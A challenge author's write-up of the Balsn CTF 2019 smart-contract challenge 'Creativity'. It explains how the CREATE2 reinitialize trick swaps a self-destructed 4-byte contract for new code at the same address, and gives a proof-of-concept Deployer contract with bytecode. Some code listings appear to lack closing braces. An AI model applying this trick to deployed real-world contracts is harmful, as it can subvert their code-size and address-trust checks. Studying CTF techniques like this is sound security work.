Creativity is one of my two smart contract challenges for Balsn CTF 2019. You may find the source files here.


Be concise, or be creative.

  • Type: Smart contract
  • Solves: 1/720
  • Keywords: CREATE2, CREATE2 reinitialize trick, EVM opcode



In this challenge, our goal is to emit the SendFlag event. According to the CREATE2 reinitialize trick, we can deploy a contract that passes the check(), self-destruct it, and then deploy a new contract at the same address with a different code. Let our new contract emit the SendFlag event, which will be executed by the delegatecall from the game contract when execute() is called.

Detailed Write-up

We are provided with the game contract source:

pragma solidity ^0.5.10;

contract Creativity {
    event SendFlag(address addr);

    address public target;
    uint randomNumber = 0;

    function check(address _addr) public {
        uint size;
        assembly { size := extcodesize(_addr) }
        require(size > 0 && size <= 4);
        target = _addr;

    function execute() public {
        require(target != address(0));

    function sendFlag() public payable {
        require(msg.value >= 100000000 ether);
        emit SendFlag(msg.sender);

Unfortunately, we don’t have that much ether to call sendFlag directly, so let’s first try to follow the logic of the game contract:

  1. Deploy a contract with its code size not more than 4 bytes.
  2. Call check() with the address of the deployed contract as the parameter.
  3. Call execute() to let the game contract make a delegatecall to our deployed contract.

The biggest problem is: How can we emit the SendFlag event by executing at most 4 bytes of EVM bytecode? The short answer is no, we can’t. Or at least in the Constantinople hard-fork, the latest release of Ethereum when the CTF is held in Oct 2019.

In short, the reasons are:

  1. Directly emit an event with LOG1 requires an event topic hash as a parameter, which is more than 4 bytes. (Ref)
  2. To invoke any type of call to another contract, at least 6 parameters should be prepared on the stack, which requires at least 6 operations and thus 6 bytes of code. (Ref)
  3. Modifying the storage of the game contract is useless since there is a selfdestruct right after the delegatecall.

The CREATE2 Trick

The CREATE2 opcode proposed in EIP-1014 behaves identically the same as CREATE, except the calculated address for the deployed contract. This discussion thread points out a critical security issue of CREATE2, the so-called CREATE2 reinitialize trick, which allows a contract to change in-place after being deployed. You may find a detailed explanation in the link above.

Here is a simple PoC of the CREATE2 reinitialize trick (re-written from this contract). All contracts deployed by deploy(code) through Deployer will be deployed at the same address. However, the code of these contracts can be different.

pragma solidity ^0.5.10;

contract Deployer {
    bytes public deployBytecode;
    address public deployedAddr;

    function deploy(bytes memory code) public {
        deployBytecode = code;
        address a;
        // Compile Dumper to get this bytecode
        bytes memory dumperBytecode = hex'6080604052348015600f57600080fd5b50600033905060608173ffffffffffffffffffffffffffffffffffffffff166331d191666040518163ffffffff1660e01b815260040160006040518083038186803b158015605c57600080fd5b505afa158015606f573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f820116820180604052506020811015609857600080fd5b81019080805164010000000081111560af57600080fd5b8281019050602081018481111560c457600080fd5b815185600182028301116401000000008211171560e057600080fd5b50509291905050509050805160208201f3fe';
        assembly {
            a := create2(callvalue, add(0x20, dumperBytecode), mload(dumperBytecode), 0x9453)
        deployedAddr = a;

contract Dumper {
    constructor() public {
        Deployer dp = Deployer(msg.sender);
        bytes memory bytecode = dp.deployBytecode();
        assembly {
            return (add(bytecode, 0x20), mload(bytecode))

To solve this challenge, this is our plan:

  1. Using the CREATE2 reinitialize trick, deploy a contract with content 0x33ff, which is selfdestruct(msg.sender).
  2. Call check() in the game contract to let our deployed contract pass the check.
  3. Send an empty transaction to our contract to make it self-destructed.
  4. Again, using the CREATE2 reinitialize trick, deploy a new contract at the same address that will execute emit SendFlag(0).
  5. Call execute() in the game contract, it will then fire the SendFlag event.


Congrats to @Sissel for being the only person who solved my two challenges during the CTF! I hope all of you enjoy this challenge and Balsn CTF.